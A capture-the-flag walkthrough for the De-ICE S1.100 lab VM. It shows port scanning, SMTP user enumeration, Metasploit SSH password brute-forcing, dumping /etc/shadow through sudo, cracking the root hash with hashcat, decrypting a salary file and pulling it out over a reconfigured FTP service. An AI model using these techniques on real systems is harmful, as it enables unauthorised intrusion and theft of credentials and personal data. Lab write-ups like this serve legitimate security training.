Scenario

The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Flags

  • Encrypted salary file
  • Broken FTP service

Port Scanning, Service Enumeration

Start by scanning the host to determine which ports are open and which services are running.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-15 13:42 BST
Nmap scan report for 192.168.1.100
Host is up (0.000074s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
|   2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
|   2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_  2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: NAMESPACE LOGIN-REFERRALS SORT MULTIAPPEND UNSELECT AUTH=LOGINA0001 LITERAL+ IDLE MAILBOX-REFERRALS BINARY THREAD=ORDEREDSUBJECT CAPABILITY OK STARTTLS completed SASL-IR SCAN THREAD=REFERENCES IMAP4REV1
443/tcp closed https
MAC Address: 00:0C:29:61:35:DD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

One possible way to get into this VM is by bruteforcing a valid ssh login - we first determine that password authentication is enabled by attemping to login a few times.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied (publickey,password,keyboard-interactive).

The available authentication methods are printed after the permission denied message.

Username Harvesting

Open a browser and navigate to http://192.168.1.100, where we find the Information Company Portal.

The page contains a list of employee roles, names and email address - information we can use towards bruteforcing SSH. So let’s do that :)

The Wrong Way

Save the employee list to a file, then extract their usernames into a separate list.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list 
Head of HR: Marie Mary - [email protected] (On Emergency Leave)
Employee Pay: Pat Patrick - [email protected]
Travel Comp: Terry Thompson - [email protected]
Benefits: Ben Benedict - [email protected]
Director of Engineering: Erin Gennieg - [email protected]
Project Manager: Paul Michael - [email protected]
Engineer Lead: Ester Long - [email protected]
Sr. System Admin: Adam Adams - [email protected]
System Admin (Intern): Bob Banter - [email protected]
System Admin: Chad Coffee - [email protected]

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g'
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g' > usernames

Launch the Metasploit Framework.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  msfconsole -q
msf >

Use the ssh_login module and enter the following options:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.100
msf auxiliary(ssh_login) > set USER_FILE /root/vulnhub/de-ice_s1.100/usernames
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'marym:[email protected]#$%'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'marym:[email protected]#$%^'
[-] SSH - Failed: 'marym:[email protected]#$%^&'
[-] SSH - Failed: 'marym:[email protected]#$%^&*'
[-] SSH - Failed: 'marym:!boerbul'
[-] SSH - Failed: 'marym:!boerseun'
[-] SSH - Failed: 'marym:!gatvol'
[-] SSH - Failed: 'marym:!hotnot'
[-] SSH - Failed: 'marym:!kak'
[-] SSH - Failed: 'marym:!koedoe'
[-] SSH - Failed: 'marym:!likable'

Come back in 4 hours to see zero results :( What did we do wrong?

We made two grave assumptions:

  • That the email address usernames were the same as their system login usernames.
  • That all those usernames existed on the system.

The Right Way

Take the employee list and extract their Full Names into a separate list.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g'
Marie Mary
Pat Patrick
Terry Thompson
Ben Benedict
Erin Gennieg
Paul Michael
Ester Long
Adam Adams
Bob Banter
Chad Coffee

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g' > fullnames

Grab this Gist by superkojiman (or any other similar tool) to generate lots of different possible usernames.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames            
mariemary
marymarie
marie.mary
mary.marie
marym
mmary
mmarie
m.mary
m.marie
marie
mary
[...]

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames > usernames

Now we want to actually verify which of these are valid user accounts on the target, which we can do via the smtp service. smtp-user-enum is a handy script for automating this process, but I always recommend trying manually in the first instance. Here’s why.

These are the examples provided in the smtp-user-enum script:

smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1
smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1

If we try each one in turn:

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M VRFY -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:45:07 2017 #########
192.168.1.100: marie.mary exists
192.168.1.100: mary.marie exists
192.168.1.100: mmary exists
[...]
192.168.1.100: chad exists
192.168.1.100: c.chad exists
192.168.1.100: coffee exists

######## Scan completed at Sat Jul 15 14:45:08 2017 #########
110 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -U usernames -t 192.168.1.100 
######## Scan started at Sat Jul 15 14:47:38 2017 #########
######## Scan completed at Sat Jul 15 14:47:38 2017 #########
0 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:48:16 2017 #########
######## Scan completed at Sat Jul 15 14:48:16 2017 #########
0 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -D herot.net -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:54:14 2017 #########
######## Scan completed at Sat Jul 15 14:54:15 2017 #########
0 results.

We get no meaningful results.

To work out what’s going on, connect to the smtp service and run commands manually - that way you can see out the output being returned.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 14:58:47 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
VRFY mariemary
252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery (or try finger)

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:00:42 GMT
HELO x    
250 slax.example.net Hello [192.168.1.200], pleased to meet you
EXPN mariemary
502 5.7.0 Sorry, we do not allow this operation

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:05:03 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
RCPT TO: mariemary
503 5.0.0 Need MAIL before RCPT

MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
553 5.5.4 [email protected] Real domain name required for sender address
MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
250 2.1.0 [email protected] Sender ok

RCPT TO: mariemary
550 5.1.1 mariemary... User unknown
RCPT TO: root
250 2.1.5 root... Recipient ok

Now we are getting somewhere. We’ve learned that VRFY and EXPN don’t seem to work. RCPT does work, but only if we specify @slax.exmaple.net as the MAIL FROM address. Now automate the rest in smtp-user-enum.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -f [email protected] -t 192.168.1.100
######## Scan started at Sat Jul 15 15:14:44 2017 #########
192.168.1.100: aadams exists
192.168.1.100: bbanter exists
192.168.1.100: ccoffee exists
######## Scan completed at Sat Jul 15 15:14:44 2017 #########

We now know these are the only 3 users on the system (which makes sense against what we know from the portal page) and we see that their usernames are indeed different than their email addresses. Modify your usernames file so that it only contains these 3.

SSH

Go back to the ssh_login module and modify our options.

msf auxiliary(ssh_login) > unset PASS_FILE 
msf auxiliary(ssh_login) > set BLANK_PASSWORDS true
msf auxiliary(ssh_login) > set USER_AS_PASS true
msf auxiliary(ssh_login) > run 

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'aadams:aadams'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'aadams:'
[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.200:43077 -> 192.168.1.100:22) at 2017-07-15 17:10:53 +0100
[-] SSH - Failed: 'ccoffee:ccoffee'
[-] SSH - Failed: 'ccoffee:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We got a hit on valid creds - bbanter:bbanter.

You can use the built-in ssh client of MSF.

msf auxiliary(ssh_login) > sessions 

Active sessions
===============

  Id  Type          Information                             Connection
  --  ----          -----------                             ----------
  1   shell /linux  SSH bbanter:bbanter (192.168.1.100:22)  192.168.1.200:43077 -> 192.168.1.100:22 (192.168.1.100)

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id; whoami; pwd
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter

But since it doesn’t have a command prompt and can’t do tab completion etc, I prefer to use the regular OpenSSH client.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ssh [email protected]
[email protected]'s password: 
Linux 2.6.16.
[email protected]:~$ id; whoami; pwd 
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter

Situational Awareness

Confirm the users of the system by reading /etc/passwd.

[email protected]:~$ cat /etc/passwd 
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
[...]
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

We see that aadams has a uid (User ID) of 1000 and a gid (Group ID) of 10. bbanter and ccoffee have a gid of 100. By reading /etc/group, we find what these groups are/mean.

[email protected]:~$ cat /etc/group 
root::0:root
[...]
wheel::10:root
[...]
users::100:

bbanter and ccoffee are just users; aadams is a member of wheel. The wheel group is used in some Linux system to enable its members to su to root, so it indicates a level of privileged access. It seems to obtain root access, aadams may be a good target.

We find an ftp folder by looking at the home directories, but we need to be root to access it.

[email protected]:~$ ls -l /home/
total 0
drwxr-x--- 2 aadams  users  80 Jun 29  2007 aadams
drwxr-x--- 2 bbanter users 100 Jul 15 13:18 bbanter
drwxr-x--- 2 ccoffee users  80 Jun 29  2007 ccoffee
drwx------ 3 root    root   60 Jun 29  2007 ftp

More Bruteforce

To get access as aadams, we do some more intense ssh bruteforcing. This one takes significantly longer though.

msf auxiliary(ssh_login) > set BLANK_PASSWORDS false
msf auxiliary(ssh_login) > set USERNAME aadams
msf auxiliary(ssh_login) > unset USER_FILE 
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
msf auxiliary(ssh_login) > run 

[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '

Since we’re still logged in as bbanter, we just use su to switch to aadams.

[email protected]:~$ su aadams
Password: ***********
[email protected]:/home/bbanter$ id; whoami
uid=1000(aadams) gid=10(wheel) groups=10(wheel)
aadams

Getting Root

List the commands aadams is allowed to run with sudo.

[email protected]:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

We are specifically forbidden to run su with the string root.

[email protected]:~$ su root
Password: ***********
Sorry.

Running ls as root means we can now see inside the ftp directory.

[email protected]:~$ sudo ls -lR /home/ftp/
/home/ftp/:
total 0
dr-xr-xr-x 2 root root 80 Jun 29  2007 incoming

/home/ftp/incoming:
total 140
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc

There’s our encrypted salary information. From the clue in /etc/password, we can surmise we need the root password to decrypt the file.

Use sudo to read the password hashes from /etc/shadow.

[email protected]:~$ sudo cat /etc/shadow 
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
[...]
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

$1$ means this is an md5 hash and TOi0HE5n is a salt. Each hash is using a different salt, which prevents the use of rainbow table attacks.

Feed these into a password cracker like John the Ripper or hashcat.

hashcat64.exe -a 3 -m 500 C:\Users\Rasta\Desktop\de-ice_s1-100_hashes -i ?l?l?l?l?l?l
$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:tarot

Now switch to root.

[email protected]:~$ su root
Password: *****
[email protected]:/home/aadams# id; whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
root

Getting the Flag

Now we can access the encrypted file and have full control over the VM. The challenge description hinted that it wanted us to fix the broken ftp service and use that to exfiltrate the flag.

[email protected]:/home/ftp/incoming# head -n 1 salary_dec2003.csv.enc | strings 
Salted__n
Lw$A`
YN>7
#ki8

Salted__ is a clue that the file was encrypted with OpenSSL - De-ICE is obviously running an old version.

[email protected]:~# openssl 
OpenSSL> version
OpenSSL 0.9.8b 04 May 2006

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  openssl
OpenSSL> version
OpenSSL 1.1.0e  16 Feb 2017

The two are different enough that commands on one won’t work on the other. To keep this walkthrough in keeping with the original solution of the time, we’ll decrypt the file on the VM and transfer it to ourselves via FTP (instead of the other way around).

We don’t yet know which cipher was used for the encryption - we can print a list of those available.

[email protected]:/home/ftp/incoming# openssl list-cipher-commands
aes-128-cbc
aes-128-ecb
aes-192-cbc
[...]
rc2-ofb
rc4
rc4-40

In this version of OpenSSL, there are 42. You can write a script that will run through and try them all, or you can get lucky, try the first one and win ;)

[email protected]:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:

[email protected]:/home/ftp/incoming# ls -l
total 280
-rw-r--r-- 1 root root 133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc

[email protected]:/home/ftp/incoming# less salary_dec2003.csv
,Employee information,,,,,,,,,,,,,,
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total
 Taxes Withheld (Percentage),"Insurance
Deduction
(Dollars)","Other Regular
Deduction
(Dollars)","Total Regular Deductions (Excluding taxes, in dollars)","Direct Deposit Info
Routing Number","Direct Deposit Info
Account Number"
,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264
,11,,,,,,,,,0.00%,,,$0.00,0,0
,12,,,,,,,,,0.00%,,,$0.00,0,0
,13,,,,,,,,,0.00%,,,$0.00,0,0
,14,,,,,,,,,0.00%,,,$0.00,0,0
,15,,,,,,,,,0.00%,,,$0.00,0,0
,16,,,,,,,,,0.00%,,,$0.00,0,0
,17,,,,,,,,,0.00%,,,$0.00,0,0
,18,,,,,,,,,0.00%,,,$0.00,0,0
,19,,,,,,,,,0.00%,,,$0.00,0,0
,20,,,,,,,,,0.00%,,,$0.00,0,0
,21,,,,,,,,,0.00%,,,$0.00,0,0
,22,,,,,,,,,0.00%,,,$0.00,0,0
,23,,,,,,,,,0.00%,,,$0.00,0,0
,24,,,,,,,,,0.00%,,,$0.00,0,0
,25,,,,,,,,,0.00%,,,$0.00,0,0

Exfiltrate

Modify /etc/vsftp.conf (you will probably need to lookup a vi cheat sheet!). Enable anonymous access by changing anonymous_enable=NO to anonymous_enable=YES; comment out the final line to run vsftp through inetd: listen=YES to #listen=YES.

Exit vi then run modprobe capability.

Run nmap again and you should have different results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -p20,21 -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-16 10:36 BST
Nmap scan report for 192.168.1.100
Host is up (0.000086s latency).
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT

To get the file, you need to actually login as root.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ftp 192.168.1.100
Connected to 192.168.1.100.
220 (vsFTPd 2.0.4)
Name (192.168.1.100:root): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/root"
ftp> cd /home/ftp/incoming
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x    1 0        0          133056 Jun 29  2007 salary_dec2003.csv.enc
226 Directory send OK.
ftp> get salary_dec2003.csv
local: salary_dec2003.csv remote: salary_dec2003.csv
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for salary_dec2003.csv (133038 bytes).
226 File send OK.
133038 bytes received in 0.00 secs (48.2231 MB/s)
ftp> bye
221 Goodbye.